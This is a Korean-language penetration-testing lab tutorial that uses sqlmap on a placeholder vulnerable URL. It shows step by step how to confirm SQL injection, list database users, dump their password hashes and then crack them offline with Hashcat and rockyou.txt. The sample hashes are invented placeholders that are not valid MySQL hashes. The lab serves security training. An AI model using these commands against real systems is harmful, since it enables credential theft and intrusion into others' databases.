이 랩에서는 sqlmap의 기능을 탐색합니다. sqlmap은 SQL 인젝션 취약점을 탐지하고 악용하며 데이터베이스 서버를 장악하는 과정을 자동화하는 오픈 소스 침투 테스트 도구입니다. 특히, 데이터베이스 사용자를 열거하고 대상 데이터베이스에서 비밀번호 해시를 덤프하는 방법을 배우게 됩니다. 사용자 자격 증명에 액세스하는 것은 시스템의 추가적인 침해로 이어질 수 있으므로 많은 침투 테스트에서 중요한 단계입니다. 통제된 환경에서 이러한 기술을 연습하기 위해 시뮬레이션된 취약한 웹 애플리케이션을 사용합니다.
이 단계에서는 잠재적인 SQL 인젝션 취약점을 식별하고 sqlmap이 대상 데이터베이스와 성공적으로 상호 작용할 수 있는지 확인하는 것부터 시작합니다. 이 초기 확인은 "발판"을 확보했으며 현재 사용자가 추가 열거를 수행할 충분한 권한을 가지고 있는지 확인하는 데 필수적입니다.
먼저 터미널을 엽니다. 기본 작업 디렉토리는 /home/labex/project입니다.
취약한 웹 애플리케이션에 대한 플레이스홀더 URL 을 사용합니다. 실제 시나리오에서는 정찰 및 취약점 스캔을 통해 이 URL 을 식별했을 것입니다. 이 랩에서는 대상이 http://example.com/vulnerable.php?id=1이라고 가정합니다.
SQL 인젝션을 테스트하고 데이터베이스에 대한 기본 정보를 수집하기 위해 다음 sqlmap 명령을 실행합니다. -u 플래그는 대상 URL 을 지정하고, --current-user는 현재 데이터베이스 사용자를 검색하려고 시도합니다.
sqlmap -u "http://example.com/vulnerable.php?id=1" --current-user다음과 유사한 출력이 표시되며, 이는 sqlmap이 다양한 인젝션 지점을 테스트하고 현재 사용자를 확인하고 있음을 나타냅니다.
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] the back-end DBMS is MySQL
current user: 'root@localhost'current user: 'root@localhost'라는 출력은 sqlmap이 현재 데이터베이스 사용자를 성공적으로 식별했음을 나타냅니다. root는 일반적으로 높은 권한을 가지므로 사용자 및 해시를 덤프하는 데 필요하므로 이는 좋은 신호입니다.
--users 플래그를 사용하여 모든 데이터베이스 사용자 나열이 단계에서는 sqlmap에서 --users 플래그를 사용하여 모든 데이터베이스 사용자를 열거합니다. 이는 SQL 인젝션 취약점 및 충분한 권한을 확인한 후 일반적인 다음 단계입니다. 데이터베이스 사용자를 아는 것은 추가 공격이나 데이터베이스 구조 이해에 귀중한 정보를 제공할 수 있습니다.
터미널에서 계속 진행합니다.
다음 sqlmap 명령을 실행합니다. --users 플래그는 sqlmap에 데이터베이스의 모든 사용자를 나열하도록 지시합니다.
sqlmap -u "http://example.com/vulnerable.php?id=1" --userssqlmap은 테스트를 수행한 다음 데이터베이스 사용자 목록을 검색하려고 시도합니다. 다음과 유사한 출력이 표시됩니다.
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users
[INFO] retrieved database users:
[+] 'root@localhost'
[+] 'admin@localhost'
[+] 'webuser@localhost'
[INFO] retrieved 3 database user(s)이 출력은 sqlmap이 root@localhost, admin@localhost, webuser@localhost의 세 가지 데이터베이스 사용자를 성공적으로 열거했음을 보여줍니다. 이 정보는 다음 단계에서 해당 사용자의 비밀번호 해시를 덤프하려고 시도할 때 중요합니다.
--passwords 플래그를 사용하여 비밀번호 해시 덤프 시도이 단계에서는 열거된 데이터베이스 사용자와 관련된 비밀번호 해시를 덤프하려고 시도하여 공격을 강화합니다. 이러한 해시는 오프라인에서 크랙하여 일반 텍스트 비밀번호를 얻을 수 있으므로 SQL 인젝션 공격의 궁극적인 목표인 경우가 많습니다.
터미널에서 계속 진행합니다.
다음 sqlmap 명령을 실행합니다. --passwords 플래그는 sqlmap에 모든 데이터베이스 사용자의 비밀번호 해시를 검색하도록 지시합니다.
sqlmap -u "http://example.com/vulnerable.php?id=1" --passwordssqlmap은 이제 비밀번호 해시를 추출하려고 시도합니다. 이 프로세스는 데이터베이스 크기와 복잡성에 따라 시간이 걸릴 수 있습니다. 검색된 사용자 및 해당 비밀번호 해시를 보여주는 다음과 유사한 출력이 표시됩니다.
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users password hashes
[INFO] retrieved database users password hashes:
[+] 'root@localhost': *A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4
[+] 'admin@localhost': *B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3
[+] 'webuser@localhost': *C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4
[INFO] retrieved 3 database user(s) password hash(es)출력에는 사용자 이름과 해당 비밀번호 해시가 표시됩니다. 이러한 해시는 일반적으로 데이터베이스 시스템에 특정한 형식 (예: MySQL 의 * 접두사 해시 또는 다양한 기타 해싱 알고리즘) 으로 저장됩니다. 이러한 해시는 이제 오프라인 크랙에 사용할 준비가 되었습니다.
이 단계에서는 이전 명령을 결합하여 단일 sqlmap 실행으로 사용자 및 해당 비밀번호 해시를 전체적으로 열거합니다. 이는 원하는 모든 정보를 수집하는 보다 효율적인 방법입니다. 또한 출력 내용을 분석하여 검색된 데이터의 구조를 이해합니다.
터미널에서 계속 진행합니다.
--users 및 --passwords 플래그를 결합한 다음 sqlmap 명령을 실행합니다.
sqlmap -u "http://example.com/vulnerable.php?id=1" --users --passwordssqlmap은 프로세스를 실행하며, 먼저 사용자를 열거한 다음 해당 비밀번호 해시를 검색하려고 시도합니다. 출력은 이전 단계에서 보았던 내용과 유사하지만 함께 표시되는 방식으로 정보를 통합합니다.
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users
[INFO] retrieved database users:
[+] 'root@localhost'
[+] 'admin@localhost'
[+] 'webuser@localhost'
[INFO] fetching database users password hashes
[INFO] retrieved database users password hashes:
[+] 'root@localhost': *A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4
[+] 'admin@localhost': *B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3
[+] 'webuser@localhost': *C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4
[INFO] retrieved 3 database user(s) password hash(es)결과 분석:
*) 로 시작합니다.이 결합된 명령은 두 가지 정보를 한 번에 수집하는 데 효율적입니다.
이 마지막 단계에서는 비밀번호 해시를 성공적으로 덤프한 결과와 다음 논리적 단계인 오프라인 비밀번호 크랙에 대해 논의합니다. sqlmap은 해시를 검색하는 데 도움을 주지만, 해시를 크랙하지는 않습니다. 이는 일반적으로 전문 도구를 사용하여 수행됩니다.
다음과 같은 비밀번호 해시를 성공적으로 검색했습니다.
*A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4 (root@localhost용)*B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3 (admin@localhost용)*C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4 (webuser@localhost용)이 해시는 실제 비밀번호가 아니라 암호화된 표현입니다. 일반 텍스트 비밀번호를 얻으려면 일반적으로 Hashcat 또는 John the Ripper와 같은 도구를 사용합니다.
오프라인 비밀번호 크랙 프로세스:
sqlmap은 종종 힌트 (예: "MySQL 비밀번호 해시") 를 제공합니다. Hashcat과 같은 도구에는 다양한 해시 유형에 대한 모드가 있습니다.~/project 디렉터리에 hashes.txt라는 파일을 만들 수 있습니다.*A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4
*B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3
*C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4300) 에 Hashcat을 사용하는 경우:## This command is for illustrative purposes and will not be executed in this lab.
## hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt --forcerockyou.txt는 일반적인 단어 목록으로, Kali Linux 또는 유사한 배포판의 /usr/share/wordlists/에서 자주 발견됩니다. 압축을 해제해야 할 수도 있습니다.)성공적인 크랙은 일반 텍스트 비밀번호를 표시하며, 이를 사용하여 데이터베이스 또는 이러한 자격 증명이 재사용될 수 있는 다른 시스템에 대한 추가 액세스 권한을 얻을 수 있습니다. 이는 강력하고 고유한 비밀번호와 보안을 위한 적절한 해싱 알고리즘의 중요성을 강조합니다.
이 실습에서는 sqlmap을 사용하여 데이터베이스 사용자를 열거하고 시뮬레이션된 취약한 웹 애플리케이션에서 해당 비밀번호 해시를 덤프하는 방법을 배웠습니다. 발판을 마련하고 충분한 권한을 확인하는 것으로 시작하여, --users 플래그를 사용하여 모든 데이터베이스 사용자를 나열하고, 마지막으로 --passwords 플래그를 사용하여 비밀번호 해시를 덤프하려고 시도했습니다. 또한 효율성을 위해 이러한 작업을 결합하는 방법과 출력 분석 방법을 배웠습니다.
이러한 민감한 정보를 추출하는 방법을 이해하는 것은 침투 테스트에서 중요한 기술입니다. 검색된 비밀번호 해시는 다음 단계인 오프라인 비밀번호 크랙의 열쇠이며, 이를 통해 일반 텍스트 자격 증명을 밝혀내고 잠재적으로 더 깊은 시스템 침해로 이어질 수 있습니다. 이 실습은 윤리적 해킹 도구 모음에서 강력한 도구를 실질적으로 경험할 수 있는 기회를 제공했습니다.
